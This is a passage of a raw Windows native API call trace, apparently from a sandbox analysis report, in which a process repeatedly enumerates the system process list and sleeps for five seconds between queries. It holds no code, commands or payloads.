FreeType=0x8000) returned 0x0 [0247.028] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.034] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.036] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.040] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.049] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.058] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.084] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.091] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.097] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.104] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.111] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.118] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.124] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.131] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.138] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.145] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.152] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.160] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.167] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.174] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.181] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0247.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0247.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.188] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0247.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0247.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0247.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0247.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 